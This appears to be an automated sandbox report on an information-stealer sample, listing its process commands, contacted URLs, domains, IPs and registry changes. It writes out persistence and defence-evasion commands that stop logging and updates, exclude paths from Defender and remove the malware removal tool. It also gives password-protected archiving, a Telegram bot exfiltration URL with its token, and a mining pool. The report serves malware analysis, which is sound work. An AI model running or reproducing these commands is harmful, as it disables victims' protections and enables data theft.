C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto"
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop eventlog
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe start "JLDYOGXF"
|
||
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
|
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)
-ExclusionExtension '.exe' -Force
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop UsoSvc
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop WaaSMedicSvc
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop wuauserv
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop bits
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop dosvc
|
||
C:\Windows\explorer.exe
|
explorer.exe
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip"
*"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp"
"c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wusa.exe
|
wusa /uninstall /kb:890830 /quiet /norestart
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wusa.exe
|
wusa /uninstall /kb:890830 /quiet /norestart
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 105 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot5909479554:AAHBh0elmAGqD01xNsl_4RAIClCAhxA3CaI/sendDocument
|
149.154.167.220
|
||
https://github.com/Blank-c/BlankOBF
|
unknown
|
||
https://api.telegram.org/bot%s/%s
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://api.telegram.org/bot%s/%sp~
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberi
|
unknown
|
||
http://www.micom/pkiops/Docs/ry.htm0
|
unknown
|
||
http://ip-api.com/line/?fields=hostingr=r
|
unknown
|
||
https://python.org/dev/peps/pep-0263/
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://api.anonfiles.com/upload
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/api/v9/users/
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://api.gofile.io/getServerr=r
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
http://tools.ietf.org/html/rfc6125#section-6.4.3
|
unknown
|
||
https://api.telegram.org/bot%s/%s)
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://google.com/mail
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://foss.heptapod.net/pypy/pypy/-/issues/3539
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
|
unknown
|
||
http://google.com/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssm0
|
unknown
|
||
https://www.python.org/download/releases/2.3/mro/.
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
|
unknown
|
||
http://csrc.nist.gov/publications/nistpubs/800(
|
unknown
|
||
http://ip-api.com/line/?fields=hostingr=
|
unknown
|
||
http://ip-api.com/json/?fields=225545r
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsD
|
unknown
|
||
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
|
unknown
|
||
https://yahoo.com/
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
http://cacerts.digicert.co
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://html.spec.whatwg.org/multipage/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://github.com/Unidata/MetPy/bl
|
unknown
|
||
https://api.gofile.io/getServer
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920n
|
unknown
|
||
https://login.mic
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
https://github.com/Blank-c/Blank-GrabberrV
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
http://ocsp.thawte.com0
|
unknown
|
||
https://api.gofile.io/getServerr=
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
|
unknown
|
||
https://json.org
|
unknown
|
||
https://www.python.org/dev/peps/pep-0205/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://www.olx.pl/
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
|
unknown
|
||
https://google.com/
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
pool.hashvault.pro
|
45.76.89.70
|
||
api.telegram.org
|
149.154.167.220
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
45.76.89.70
|
pool.hashvault.pro
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
208.95.112.1
|
ip-api.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
|
DontOfferThroughWUAU
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
19DCB065000
|
heap
|
page read and write
|
||
2D8F5F80000
|
direct allocation
|
page read and write
|
||
972000
|
unkown
|
page readonly
|
||
2D8F6B8A000
|
heap
|
page read and write
|
||
2D8F6114000
|
heap
|
page read and write
|
||
2D8F6364000
|
heap
|
page read and write
|
||
2D8F6139000
|
heap
|
page read and write
|
||
19DCB063000
|
heap
|
page read and write
|
||
2D8F6364000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
1E00446E000
|
trusted library allocation
|
page read and write
|
||
181AD7AB000
|
heap
|
page read and write
|
||
2D8F5DB9000
|
heap
|
page read and write
|
||
7FFE1031A000
|
unkown
|
page execute and read and write
|
||
2D8F64EF000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
19CBBB44000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6496000
|
heap
|
page read and write
|
||
1A6018FD000
|
heap
|
page read and write
|
||
2D8F69F0000
|
direct allocation
|
page read and write
|
||
278CA9F9000
|
heap
|
page read and write
|
||
21901A4A000
|
trusted library allocation
|
page read and write
|
||
1DDF000
|
heap
|
page read and write
|
||
69F000
|
unkown
|
page readonly
|
||
7FFE12E10000
|
unkown
|
page readonly
|
||
219181E4000
|
heap
|
page read and write
|
||
7FFD9B110000
|
trusted library allocation
|
page read and write
|
||
2D8F63D4000
|
heap
|
page read and write
|
||
19CBBB83000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2D8F63DA000
|
heap
|
page read and write
|
||
1316000
|
heap
|
page read and write
|
||
1D6A000
|
heap
|
page read and write
|
||
2D8F3C5A000
|
heap
|
page read and write
|
||
19CBBDBB000
|
heap
|
page read and write
|
||
2D8F6320000
|
heap
|
page read and write
|
||
215A32DC000
|
heap
|
page read and write
|
||
2D8F5DFA000
|
heap
|
page read and write
|
||
2D8F64BC000
|
heap
|
page read and write
|
||
21014FC0000
|
heap
|
page read and write
|
||
265318A1000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
28A222E0000
|
heap
|
page read and write
|
||
1E01AB4E000
|
heap
|
page read and write
|
||
7FFE01301000
|
unkown
|
page execute and read and write
|
||
21901B32000
|
trusted library allocation
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
215A32CD000
|
heap
|
page read and write
|
||
2D8F60C9000
|
heap
|
page read and write
|
||
2D8F6A08000
|
direct allocation
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
282B6255000
|
heap
|
page read and write
|
||
2D8F658A000
|
heap
|
page read and write
|
||
2E4A9A92000
|
heap
|
page read and write
|
||
2D8F6483000
|
heap
|
page read and write
|
||
20DBCBC6000
|
heap
|
page read and write
|
||
7FFD9AFF0000
|
trusted library allocation
|
page read and write
|
||
B53330E000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFDFB005000
|
unkown
|
page execute and read and write
|
||
256F2C37000
|
heap
|
page read and write
|
||
515D000
|
trusted library allocation
|
page read and write
|
||
1DA4000
|
heap
|
page read and write
|
||
937AAFF000
|
stack
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
282ACFA0000
|
heap
|
page read and write
|
||
20871375000
|
heap
|
page read and write
|
||
19CBC27C000
|
heap
|
page read and write
|
||
C60096E000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
215A32B7000
|
heap
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
181B0BC0000
|
direct allocation
|
page read and write
|
||
7FFE0EB6D000
|
unkown
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
278963A0000
|
heap
|
page read and write
|
||
201E0270000
|
heap
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
20DBCBB8000
|
heap
|
page read and write
|
||
282B62B1000
|
heap
|
page read and write
|
||
2D8F3CAC000
|
heap
|
page read and write
|
||
7FFD9AD00000
|
trusted library allocation
|
page read and write
|
||
1D10000
|
heap
|
page read and write
|
||
7FFD9B000000
|
trusted library allocation
|
page read and write
|
||
2D8F6E5E000
|
heap
|
page read and write
|
||
7FFE11525000
|
unkown
|
page execute and read and write
|
||
1E012CBF000
|
trusted library allocation
|
page read and write
|
||
2D8F64D1000
|
heap
|
page read and write
|
||
28A222E5000
|
heap
|
page read and write
|
||
2D8F3C85000
|
heap
|
page read and write
|
||
7FF623F71000
|
unkown
|
page execute read
|
||
2070D460000
|
heap
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
2D8F647D000
|
heap
|
page read and write
|
||
181AD81C000
|
heap
|
page read and write
|
||
E3D2CFF000
|
stack
|
page read and write
|
||
2D8F63A4000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64BC000
|
heap
|
page read and write
|
||
1E0025F4000
|
heap
|
page read and write
|
||
2D8F649B000
|
heap
|
page read and write
|
||
7FFDFA221000
|
unkown
|
page execute and read and write
|
||
2D8F5E01000
|
heap
|
page read and write
|
||
7FFD9ADB6000
|
trusted library allocation
|
page read and write
|
||
21645ADC000
|
heap
|
page read and write
|
||
2D8F6623000
|
heap
|
page read and write
|
||
215A34B4000
|
heap
|
page read and write
|
||
2D8F64CD000
|
heap
|
page read and write
|
||
1F72EF00000
|
heap
|
page read and write
|
||
7D9FFFF000
|
stack
|
page read and write
|
||
28A22059000
|
heap
|
page read and write
|
||
2D8F5DE3000
|
heap
|
page read and write
|
||
7FFD9ADB0000
|
trusted library allocation
|
page read and write
|
||
2D8F5E6B000
|
heap
|
page read and write
|
||
1E002550000
|
heap
|
page read and write
|
||
282ACFC1000
|
heap
|
page read and write
|
||
2D8F6614000
|
heap
|
page read and write
|
||
2AF86490000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
C600CFF000
|
stack
|
page read and write
|
||
518F000
|
trusted library allocation
|
page read and write
|
||
E62000
|
trusted library allocation
|
page read and write
|
||
2D8F55F4000
|
heap
|
page read and write
|
||
303998C000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F64B0000
|
heap
|
page read and write
|
||
1D90000
|
heap
|
page read and write
|
||
26D676C000
|
stack
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
27CC37C0000
|
heap
|
page read and write
|
||
5F65DFE000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
181AD7CA000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
19CBBC10000
|
heap
|
page read and write
|
||
4800000
|
direct allocation
|
page read and write
|
||
28A22061000
|
heap
|
page read and write
|
||
2D8F661A000
|
heap
|
page read and write
|
||
2D8F6630000
|
heap
|
page read and write
|
||
2D8F6496000
|
heap
|
page read and write
|
||
7FFDFA111000
|
unkown
|
page execute and read and write
|
||
2197FD20000
|
heap
|
page read and write
|
||
7FF63426E000
|
unkown
|
page readonly
|
||
B5325BE000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
167E803B000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
19CBBDE4000
|
heap
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
21901A0B000
|
trusted library allocation
|
page read and write
|
||
2D8F6D15000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
196D8B24000
|
heap
|
page read and write
|
||
2197E0A0000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
2D8F3C5A000
|
heap
|
page read and write
|
||
2D8F6614000
|
heap
|
page read and write
|
||
1A49C5C0000
|
heap
|
page read and write
|
||
7FFD9B090000
|
trusted library allocation
|
page read and write
|
||
2D8F64A1000
|
heap
|
page read and write
|
||
7FFD9B0A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6644000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
1FE983CD000
|
heap
|
page read and write
|
||
1E01AC23000
|
heap
|
page read and write
|
||
7000000
|
direct allocation
|
page read and write
|
||
1FE983C7000
|
heap
|
page read and write
|
||
181AD7AA000
|
heap
|
page read and write
|
||
2BBC000
|
stack
|
page read and write
|
||
181AD9B0000
|
direct allocation
|
page read and write
|
||
20DBCBB8000
|
heap
|
page read and write
|
||
2625EAE0000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
256E8AC0000
|
heap
|
page read and write
|
||
21E8EE8D000
|
heap
|
page read and write
|
||
7FFDFB272000
|
unkown
|
page execute and read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
19CBBDBA000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
E56000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F63B5000
|
heap
|
page read and write
|
||
4C2DAFF000
|
stack
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F6440000
|
heap
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
CF130FE000
|
stack
|
page read and write
|
||
2D8F64D5000
|
heap
|
page read and write
|
||
5130000
|
trusted library allocation
|
page read and write
|
||
1C378720000
|
heap
|
page read and write
|
||
4315BED000
|
stack
|
page read and write
|
||
1F72EC90000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F60DF000
|
heap
|
page read and write
|
||
7FFDFAF91000
|
unkown
|
page execute and write copy
|
||
9CFF31C000
|
stack
|
page read and write
|
||
2AF862AB000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
278CA9F0000
|
heap
|
page read and write
|
||
7FFD9B170000
|
trusted library allocation
|
page read and write
|
||
215A32DC000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFE13330000
|
unkown
|
page readonly
|
||
2D8F5DA1000
|
heap
|
page read and write
|
||
2625EB10000
|
heap
|
page read and write
|
||
2D8F3C54000
|
heap
|
page read and write
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
7FF633FE0000
|
unkown
|
page readonly
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
21EE57F0000
|
heap
|
page read and write
|
||
7FFE126D1000
|
unkown
|
page execute and read and write
|
||
2197E901000
|
heap
|
page read and write
|
||
1A60187A000
|
heap
|
page read and write
|
||
2D8F3CA2000
|
heap
|
page read and write
|
||
181B0DE0000
|
direct allocation
|
page read and write
|
||
2D8F3C5B000
|
heap
|
page read and write
|
||
181AD7B0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
19CBBDEA000
|
heap
|
page read and write
|
||
2D8F665B000
|
heap
|
page read and write
|
||
266C29B8000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2D8F6450000
|
heap
|
page read and write
|
||
266C29C7000
|
heap
|
page read and write
|
||
B5323FE000
|
stack
|
page read and write
|
||
7FFDFB2E5000
|
unkown
|
page execute and read and write
|
||
21EE58B0000
|
heap
|
page read and write
|
||
19CBC27C000
|
heap
|
page read and write
|
||
B53328E000
|
stack
|
page read and write
|
||
2D8F6E1D000
|
heap
|
page read and write
|
||
7FFD9B0E0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AF40000
|
trusted library allocation
|
page read and write
|
||
1DC70E51000
|
heap
|
page read and write
|
||
1D9206A1000
|
heap
|
page read and write
|
||
167E8051000
|
heap
|
page read and write
|
||
19DCB06D000
|
heap
|
page read and write
|
||
2D8F6375000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F6468000
|
heap
|
page read and write
|
||
21900F48000
|
trusted library allocation
|
page read and write
|
||
2D8F72E4000
|
direct allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
21E8EE99000
|
heap
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
7A00000
|
direct allocation
|
page read and write
|
||
1F52EEA0000
|
heap
|
page read and write
|
||
375E3FF000
|
unkown
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
181AD7D3000
|
heap
|
page read and write
|
||
2D8F5DE3000
|
heap
|
page read and write
|
||
24310B20000
|
heap
|
page read and write
|
||
21645AA7000
|
heap
|
page read and write
|
||
2D8F63D7000
|
heap
|
page read and write
|
||
20DBCB93000
|
heap
|
page read and write
|
||
1E002E85000
|
trusted library allocation
|
page read and write
|
||
181AD980000
|
heap
|
page read and write
|
||
219186E8000
|
heap
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
22156720000
|
heap
|
page read and write
|
||
1E002420000
|
trusted library allocation
|
page read and write
|
||
2D8F59CC000
|
direct allocation
|
page read and write
|
||
256F2C3B000
|
heap
|
page read and write
|
||
7FF77203E000
|
unkown
|
page readonly
|
||
215A32A5000
|
heap
|
page read and write
|
||
219010F3000
|
trusted library allocation
|
page read and write
|
||
29532521000
|
heap
|
page read and write
|
||
201E0310000
|
heap
|
page read and write
|
||
E3D000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
F7F97F000
|
stack
|
page read and write
|
||
2D8F5E42000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFE12E1C000
|
unkown
|
page read and write
|
||
167E8310000
|
heap
|
page read and write
|
||
8677D7F000
|
stack
|
page read and write
|
||
21645A80000
|
heap
|
page read and write
|
||
17A51824000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2D8F661E000
|
heap
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
F22B3FF000
|
stack
|
page read and write
|
||
2D8F6275000
|
heap
|
page read and write
|
||
21902009000
|
